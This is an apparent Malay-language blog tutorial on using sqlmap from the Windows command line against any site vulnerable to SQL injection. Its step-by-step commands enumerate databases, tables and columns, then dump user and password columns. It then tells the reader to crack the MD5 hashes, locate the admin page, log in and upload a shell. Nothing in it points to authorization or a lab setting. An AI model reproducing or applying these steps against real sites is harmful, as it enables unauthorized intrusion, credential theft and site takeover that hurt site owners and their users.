SQLMAP Windows


Bahan2 yang anda perlukan :P

1.Sqlmap
2.Site yang vuln sql injection ,
3.Nasib , sebab kadang2 tak dapat database . hahahaha :P


Pertama , anda perlu tahu command2 sqlmap antara nya :-


" --random-agent --threads 10 --banner --dbs " = untuk mendapat kan database dan detail2 lain .
" --tables " = untuk dapatkan table dalam database
" --columns " = untuk dapatkan colums dalam table
" --dump " = untuk dump data yg ada dalam database



Kedua , run sqlmap . buka cmd dan jalan kan perintah ini .

C:\Users\admin>cd\
C:\>cd sqlmap
C:\sqlmap>sqlmap.py -u ( site vuln ) --random-agent --threads 10 --banner --dbs
Kemudian tekan enter dan tunggu beberapa seketika untuk mendapatkan database , kadang2 sqlmap akan meminta permission untuk meneruskan proses sqli . anda hanya perlu tekan " c " untuk continue , " y " yes . :)




Setelah anda scan , database yang diperolehi akan tetera . Macam yang ada di dalam gambar :)



Sekarang masa nya untuk kita dapatkan tables dalam database . Jalan kan perintah " --tables " . Macam ini

C:\sqlmap>sqlmap.py -u ( site vuln ) --random-agent --threads 10 --banner -D ( database ) --tables
Oke , kalau anda berjaya . Tables yang berada dalam database akan terpapar . Sekarang anda perlu cari tables untuk user . Pandai2 cari lah ea :P



Setelah anda memilih Tables untuk user , anda perlu jalan kan perintah " --columns " untuk mendapatkan columns didalam database :)

C:\sqlmap>sqlmap.py -u ( site vuln ) --random-agent --threads 10 --banner -D ( database )-T ( tables ) --columns

Columns akan terpapar .



Sekarang , kita perlu dump password yg berada di dalam columns . Jalankan perintah " --dump " :)

C:\sqlmap>sqlmap.py -u ( vuln site ) --random-agent --threads 10 --banner -D ( database ) -T ( tables ) -C ( columns user ),( columns pass ) --dump

Nahhhh , hasil dump anda akan terpapar .



Sekarang anda hanya perlu decrypt md5 di sini :) Dan cari admin page . Cara2 cari admin page silalah google sendiri . Login dan upload shell ada :P






Previous
Next Post »